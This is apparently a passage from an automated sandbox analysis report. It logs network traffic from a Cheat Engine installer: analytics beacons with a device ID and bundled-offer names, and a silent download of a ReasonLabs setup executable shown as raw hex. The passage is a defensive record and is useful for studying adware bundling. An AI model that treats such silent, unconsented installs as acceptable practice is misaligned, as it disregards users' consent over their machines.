                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"WebAdvisor\",\"18\":\"ZB_WebAdvisor_V3\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\
                                                                                                                                                                                                                                    2024-12-28 21:21:37 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:37 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 81ca2982b40de033ec660f6290bc0e20.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: 0k1coGraUdMyerbC7L3S2XwGWh_QqXKW3aBUV7e9GyU5oIUS1Z-C1Q==
                                                                                                                                                                                                                                    2024-12-28 21:21:37 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    21192.168.2.5498963.165.135.34436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:39 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 459
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:21:39 UTC459OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:21:40 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:39 GMT
                                                                                                                                                                                                                                    Via: 1.1 b2ba040f19ad0239b9239a26b1640b9e.cloudfront.net (CloudFront), 1.1 07a26444aa664d975523a497b1ae5758.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P4
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: wzbZvkixasqKfOKQfybgbbPhM_xfA1bSW-koSe-9HtCI_tdgdVXY9w==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    22192.168.2.54990365.9.108.934436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:42 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 400
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:21:42 UTC400OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 61 74 68 65 72 5a 65 72 6f 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 5a 5f 56 31 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c 22 3a 5c 22 33 5c 22
                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"WeatherZero\",\"18\":\"ZB_WZ_V1\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\":\"3\"
                                                                                                                                                                                                                                    2024-12-28 21:21:43 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:43 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 43ea48c3f6365b58e0e610399bbffb40.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: KcatZQj5atNMzo2UPwseLqGCctvixSD6QP7kQgJeluz8vABq2WcFfA==
                                                                                                                                                                                                                                    2024-12-28 21:21:43 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    23192.168.2.5499113.165.135.34436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:45 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 447
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:21:45 UTC447OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:21:46 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:45 GMT
                                                                                                                                                                                                                                    Via: 1.1 fab151d68d1a2f6afb087e422136c6fe.cloudfront.net (CloudFront), 1.1 f0ff45e105821feb76f7404e065f9c6e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P4
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: CDG52-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: CpM0czJf9J1JGiiRR3pekXHuxGCdjDNtYq70EAek4IpvUlmLo15vSA==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                    24192.168.2.54992018.66.161.123443
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:48 UTC273OUTGET /ReasonLabs-Setup-Wizard.exe?dui=9e146be9-c76a-4720-bcdb-53011b87bd06&dit=20241228162010&is_silent=true&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&b=&se=true&oip=26&ptl=7&dta=true&pds=%5bepp%2cvpn%2cdns%5d HTTP/1.1
                                                                                                                                                                                                                                    Host: shield.reasonsecurity.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2024-12-28 21:21:49 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                                                                    Content-Length: 2552264
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:21:49 GMT
                                                                                                                                                                                                                                    ETag: W/"26f1c8-cpAH4A64hrlE9LSVJ23kBLeZFJ8"
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                    Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                    X-Download-Options: noopen
                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                    X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                    content-disposition: attachment; filename=ReasonLabs-Setup-Wizard.exe
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 7cb7aff585b14d8a9957e9d3c12f8186.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH52-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: qqTnyurNQ32lUVH-EaRn3ns3-pyqhnyg0j-VK8ycavDQBYnGtpPdng==
                                                                                                                                                                                                                                    2024-12-28 21:21:49 UTC3364INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 4b 61 00 ed 2a 0f 53 ed 2a 0f 53 ed 2a 0f 53 82 35 04 53 ee 2a 0f 53 6e 36 01 53 e5 2a 0f 53 82 35 05 53 e6 2a 0f 53 82 35 0b 53 ef 2a 0f 53 63 22 50 53 ec 2a 0f 53 ed 2a 0e 53 64 2a 0f 53 6e 22 52 53 e4 2a 0f 53 db 0c 04 53 ae 2a 0f 53 fb 55 0b 52 ec 2a 0f 53 db 0c 05 53 ef 2a 0f 53 f6 b7 a5 53 e1 2a 0f 53 75 58 0c 52 ec 2a 0f 53 2a 2c 09 53 ec 2a 0f 53 52 69 63 68 ed 2a 0f
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ka*S*S*S5S*Sn6S*S5S*S5S*Sc"PS*S*Sd*Sn"RS*SS*SUR*SS*SS*SuXR*S*,S*SRich*
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC8192INData Raw: 31 00 00 ff 75 e4 e8 b4 18 00 00 59 ff 36 e8 ac 18 00 00 59 5e 8b 4d f4 64 89 0d 00 00 00 00 c9 c3 8b 41 04 3b 42 04 75 13 8b 12 8b 09 52 51 ff 15 48 b1 41 00 59 85 c0 59 75 01 c3 6a 01 58 c3 55 8b ec 81 ec 14 01 00 00 8d 85 ec fe ff ff c7 85 ec fe ff ff 14 01 00 00 50 ff 15 cc b0 41 00 85 c0 74 0e 83 bd fc fe ff ff 02 75 05 6a 01 58 c9 c3 33 c0 c9 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c 89 48 10 88 48 14 88 48 15 c7 00 28 b7 41 00 c3 56 8b 74 24 10 6a 10 68 cc c3 41 00 ff 74 24 14 83 26 00 e8 21 7e 01 00 83 c4 0c 85 c0 75 0d 8b 44 24 08 89 06 ff 40 04 33 c0 eb 05 b8 02 40 00 80 5e c2 0c 00 56 8b 74 24 08 ff 4e 04 8b 46 04 75 14 85 f6 74 0e 8b ce e8 0d 00 00 00 56 e8 d9 17 00 00 59 33 c0 5e c2 04 00 c7 01 28 b7 41 00 83 c1 08 e9 3d 02 00 00 b8 e4 9e 41
                                                                                                                                                                                                                                    Data Ascii: 1uY6Y^MdA;BuRQHAYYujXUPAtujX33HHHHHH(AVt$jhAt$&!~uD$@3@^Vt$NFutVY3^(A=A
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC6288INData Raw: f1 ff 15 5c b1 41 00 8b f8 3b 7e 08 76 1c 8d 44 3f 02 53 50 e8 72 f8 ff ff ff 36 8b d8 e8 9d f8 ff ff 59 89 1e 59 89 7e 08 5b 8b 4c 24 0c 8d 47 01 89 7e 04 8b 36 85 c0 76 0d 66 8b 11 66 89 16 46 46 41 41 48 75 f3 5f 5e c2 04 00 55 8b ec 51 53 8b 5d 08 56 33 f6 80 3b 00 57 8b f9 74 07 46 80 3c 1e 00 75 f9 3b 77 08 76 1e 8d 44 36 02 50 e8 16 f8 ff ff ff 37 89 45 fc e8 40 f8 ff ff 8b 45 fc 59 59 89 07 89 77 08 8b 07 33 c9 85 f6 76 16 8b d0 eb 03 8b 5d 08 66 0f b6 1c 19 66 89 1a 41 42 42 3b ce 72 ee 66 83 24 70 00 89 77 04 8b c7 5f 5e 5b c9 c2 04 00 6a 2e e8 53 e5 ff ff c3 6a 20 e8 4b e5 ff ff c3 83 79 04 00 74 05 e9 ed ff ff ff c3 53 8b 5c 24 08 56 57 33 ff 8b f1 66 39 3b 74 0b 8b c3 47 40 40 66 83 38 00 75 f7 57 8b ce e8 a4 fb ff ff 8b 46 04 8b d3 8b 1e 8d
                                                                                                                                                                                                                                    Data Ascii: \A;~vD?SPr6YY~[L$G~6vffFFAAHu_^UQS]V3;WtF<u;wvD6P7E@EYYw3v]ffABB;rf$pw_^[j.Sj KytS\$VW3f9;tG@@f8uWF
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC3198INData Raw: 4e 28 33 ff 83 fb 02 89 79 04 66 89 38 75 20 8d 45 e0 50 e8 a6 e6 ff ff eb 15 ff 75 0c 8b ce 50 e8 27 ff ff ff 84 c0 0f 84 e4 00 00 00 33 ff 66 81 66 20 ef fb 83 4d c4 ff 89 3e 89 7e 04 8d 45 e0 8d 4d c8 50 c6 45 fc 02 e8 de e5 ff ff 8d 4d ac c6 45 fc 03 e8 1f e5 ff ff 8d 45 0f 8d 4d c4 50 8d 45 ac 50 c6 45 fc 04 e8 8f fe ff ff 84 c0 74 34 80 7d 0f 00 74 26 8b 55 d4 8b 4d ac e8 b8 df ff ff 84 c0 75 23 ff 75 ac c6 45 fc 03 e8 9c df ff ff 59 8d 4d ac e8 dd e4 ff ff eb bc 6a 02 ff 15 80 b0 41 00 32 db eb 36 8b 4d b0 83 f9 07 76 11 8d 41 fa 3b c1 73 0a 8b 4d ac 89 45 b0 66 89 3c 41 8d 45 ac 8d 4e 28 50 e8 c1 e7 ff ff 8b 45 bc c6 46 24 01 89 06 8b 45 c0 89 46 04 b3 01 ff 75 ac e8 47 df ff ff ff 75 c8 e8 3f df ff ff 59 59 8d 4d c4 e8 f3 fb ff ff ff 75 e0 e8 2d
                                                                                                                                                                                                                                    Data Ascii: N(3yf8u EPuP'3ff M>~EMPEMEEMPEPEt4}t&UMu#uEYMjA26MvA;sMEf<AEN(PEF$EFuGu?YYMu-
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC1146INData Raw: fd ff ff 85 c0 7d 04 33 c0 eb 04 8d 44 30 02 5f 5e c3 8b c1 66 8b 50 08 8d 48 08 66 83 fa 55 74 06 66 83 fa 75 75 30 66 8b 50 0a 66 83 fa 4e 74 06 66 83 fa 6e 75 20 66 8b 50 0c 66 83 fa 43 74 06 66 83 fa 63 75 10 66 8b 50 0e 66 83 fa 5c 74 16 66 83 fa 2f 74 10 e8 d4 fc ff ff 85 c0 7d 03 33 c0 c3 83 c0 05 c3 8d 48 10 e8 7c ff ff ff 8d 48 08 f7 d8 1b c0 23 c1 c3 b8 f0 a3 41 00 e8 1b 39 01 00 83 ec 24 53 56 57 8b fa 8b d9 57 8b 4d 08 e8 46 d9 ff ff 8b cf e8 a6 fe ff ff 8b f0 85 f6 74 59 83 fe 01 74 54 8d 1c 36 03 fb 8b cf e8 3e 02 00 00 84 c0 74 3d 57 8d 4d d0 e8 5d d8 ff ff 83 65 fc 00 8d 4d d0 e8 17 01 00 00 84 c0 74 1b 8b 4d 08 3b 71 04 73 0a 8b 01 89 71 04 66 83 24 03 00 8d 45 d0 50 e8 26 db ff ff ff 75 d0 e8 bd d2 ff ff 59 b0 01 e9 d7 00 00 00 8d 4d e8
                                                                                                                                                                                                                                    Data Ascii: }3D0_^fPHfUtfuu0fPfNtfnu fPfCtfcufPf\tf/t}3H|H#A9$SVWWMFtYtT6>t=WM]eMtM;qsqf$EP&uYM
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC4344INData Raw: 0c 8b c6 5e c2 04 00 0f b7 01 83 f8 07 76 20 83 f8 09 76 14 83 f8 0b 76 16 83 f8 0f 76 0a 83 f8 17 76 0c 83 f8 40 74 07 51 ff 15 58 b1 41 00 c3 56 8b f1 0f b7 06 83 f8 07 76 19 83 f8 09 76 1b 83 f8 0b 76 0f 83 f8 0f 76 11 83 f8 17 76 05 83 f8 40 75 07 33 c9 66 89 0e eb 12 56 ff 15 58 b1 41 00 33 c9 3b c1 75 19 66 39 0e 75 14 89 4e 08 66 89 4e 02 66 89 4e 04 66 89 4e 06 89 4e 0c 33 c0 5e c3 66 83 39 00 75 08 66 83 61 02 00 33 c0 c3 e9 9a ff ff ff 53 57 8b 7c 24 0c 8b d9 66 83 3f 00 74 0b 8b cf e8 85 ff ff ff 85 c0 7c 13 56 8b f3 a5 a5 a5 a5 66 83 23 00 66 83 63 02 00 33 c0 5e 5f 5b c2 04 00 56 8b f1 66 83 3e 00 75 09 66 83 66 02 00 33 c0 5e c3 8b ce e8 a3 ff ff ff 85 c0 7d 08 66 c7 06 0a 00 89 46 08 5e c3 b8 04 a4 41 00 e8 2c 34 01 00 81 ec 10 02 00 00 53
                                                                                                                                                                                                                                    Data Ascii: ^v vvvv@tQXAVvvvvv@u3fVXA3;uf9uNfNfNfNN3^f9ufa3SW|$f?t|Vf#fc3^_[Vf>uff3^}fF^A,4S
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC8192INData Raw: 85 c0 75 0d 8b 75 08 8b c6 8d 4e 0c e9 c9 00 00 00 53 68 b0 b1 41 00 56 e8 2f 24 01 00 83 c4 0c 85 c0 75 0d 8b 75 08 8b c6 8d 4e 10 e9 a9 00 00 00 53 68 40 b3 41 00 56 e8 0f 24 01 00 83 c4 0c 85 c0 75 0d 8b 75 08 8b c6 8d 4e 14 e9 89 00 00 00 53 68 c0 b1 41 00 56 e8 ef 23 01 00 83 c4 0c 85 c0 75 0a 8b 75 08 8b c6 8d 4e 18 eb 6c 53 68 00 b2 41 00 56 e8 d2 23 01 00 83 c4 0c 85 c0 75 0a 8b 75 08 8b c6 8d 4e 1c eb 4f 53 68 60 b3 41 00 56 e8 b5 23 01 00 83 c4 0c 85 c0 75 0a 8b 75 08 8b c6 8d 4e 20 eb 32 53 bb a0 b2 41 00 53 56 e8 97 23 01 00 83 c4 0c 85 c0 75 2d 8b 75 08 39 46 64 8d 4e 64 75 0e 8b 46 68 51 53 50 8b 10 ff 12 85 c0 75 19 8b c6 8d 4e 24 f7 d8 1b c0 23 c1 89 07 ff 46 28 33 c0 eb 05 b8 02 40 00 80 5f 5e 5b 5d c2 0c 00 8b 44 24 04 ff 40 28 8b 40 28
                                                                                                                                                                                                                                    Data Ascii: uuNShAV/$uuNSh@AV$uuNShAV#uuNlShAV#uuNOSh`AV#uuN 2SASV#u-u9FdNduFhQSPuN$#F(3@_^[]D$@(@(
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC3198INData Raw: 08 89 7e 0c e8 80 a3 ff ff 89 7e 1c 89 7e 20 89 7e 24 8b c6 5f 5e c3 56 57 8b f9 8b 77 04 85 f6 74 1e 53 8b 07 4e 8b 1c b0 85 db 74 0e 8b cb e8 48 89 ff ff 53 e8 05 9e ff ff 59 85 f6 75 e4 5b 83 67 04 00 5f 5e c3 53 8b 59 04 83 fb 01 76 4b 56 8b 31 57 8b fb 83 ee 04 d1 ef ff 74 24 14 8b d7 8b ce ff 74 24 14 53 e8 51 01 00 00 4f 75 eb 8d 3c 9e ff 74 24 14 8b 4e 04 8b 07 4b ff 74 24 14 89 0f 8b ce 83 ef 04 53 6a 01 5a 89 46 04 e8 2a 01 00 00 83 fb 01 77 da 5f 5e 5b c2 08 00 b8 6a a6 41 00 e8 83 03 01 00 51 56 57 8b f1 6a 18 e8 56 9d ff ff 8b f8 59 89 7d f0 83 65 fc 00 85 ff 74 1f 53 8b 5d 08 53 8b cf e8 6d a3 ff ff 83 c3 0c 8d 4f 0c 53 c6 45 fc 01 e8 5d a3 ff ff 5b eb 02 33 ff 8b 46 04 8d 48 01 89 4e 04 8b 0e 89 3c 81 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 c9
                                                                                                                                                                                                                                    Data Ascii: ~~~ ~$_^VWwtSNtHSYu[g_^SYvKV1Wt$t$SQOu<t$NKt$SjZF*w_^[jAQVWjVY}etS]SmOSE][3FHN<M_^d
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC1642INData Raw: 62 e1 ff ff 85 c0 75 0e 8d 55 d8 8b cb e8 61 e1 ff ff 85 c0 74 07 8b f0 e9 92 01 00 00 8b 45 d8 89 47 68 8b 45 dc 89 47 6c 80 7e 19 00 0f 84 73 01 00 00 8b 45 c0 89 45 e0 33 c0 39 45 e4 7c 06 8b 4d e8 89 4d e0 39 45 e0 89 45 ec 0f 86 54 01 00 00 8b 45 bc 8b 4d ec 33 db 8b 04 88 89 47 3c 8b 46 38 3b c3 74 13 8b 08 8d 55 d8 52 53 50 ff 51 0c 3b c3 0f 85 6b 01 00 00 8b 4e 30 3b cb 74 0d e8 e0 e0 ff ff 3b c3 0f 85 57 01 00 00 89 5d 08 8d 45 08 8b cf 50 c6 45 fc 04 ff 77 3c 56 e8 f9 fc ff ff 3b c3 89 45 e4 0f 85 3d 01 00 00 8b 45 08 3b c3 75 09 c6 45 fc 03 e9 d8 00 00 00 8b 4e 30 3b cb 74 1e 8b 55 d0 ff 76 38 89 55 c8 8b 55 d4 8d 5d c8 89 55 cc 8b 10 53 51 50 ff 52 0c 8b d8 eb 3c 89 5d e4 8b 08 8d 55 e4 52 68 c0 b4 41 00 50 c6 45 fc 05 ff 11 8b 45 e4 3b c3 0f
                                                                                                                                                                                                                                    Data Ascii: buUatEGhEGl~sEE39E|MM9EETEM3G<F8;tURSPQ;kN0;t;W]EPEw<V;E=E;uEN0;tUv8UU]USQPR<]URhAPEE;
                                                                                                                                                                                                                                    2024-12-28 21:21:50 UTC2896INData Raw: 53 8b ce e8 b3 fc ff ff 80 66 17 00 8b f8 83 ff 01 0f 85 d3 01 00 00 83 7d e8 00 0f 84 c9 01 00 00 83 7b 3c 00 0f 84 bf 01 00 00 80 be ab 00 00 00 00 74 0c 84 86 ac 00 00 00 0f 84 aa 01 00 00 8b 46 28 83 f8 04 0f 86 3f 01 00 00 8b 46 28 8b 4e 24 8d 7e 24 ba 80 bc 41 00 8d 4c 41 f8 e8 be 8b ff ff 84 c0 0f 84 20 01 00 00 8b 46 28 8b cf 83 c0 fc 50 8d 45 d0 50 e8 02 ea ff ff 8b 03 83 65 08 00 c6 45 fc 03 83 78 0c 00 0f 86 f1 00 00 00 8b 40 08 8b 4d 08 ba 70 bc 41 00 8b 3c 88 8b 4f 10 e8 7a 8b ff ff 84 c0 0f 85 c2 00 00 00 8d 45 d0 8d 4d dc 50 e8 99 90 ff ff 8d 4d dc c6 45 fc 04 e8 89 92 ff ff 8d 45 c4 8b cf 50 e8 7a 01 00 00 50 8d 4d dc c6 45 fc 05 e8 d9 92 ff ff ff 75 c4 c6 45 fc 04 e8 6c 8a ff ff 59 8d 7e 18 8d 45 dc 8b cf 50 e8 ec 90 ff ff 68 78 bc 41 00
                                                                                                                                                                                                                                    Data Ascii: Sf}{<tF(?F(N$~$ALA F(PEPeEx@MpA<OzEMPMEEPzPMEuElY~EPhxA


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    25192.168.2.5499213.165.135.34436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:21:49 UTC308OUTPOST / HTTP/1.1
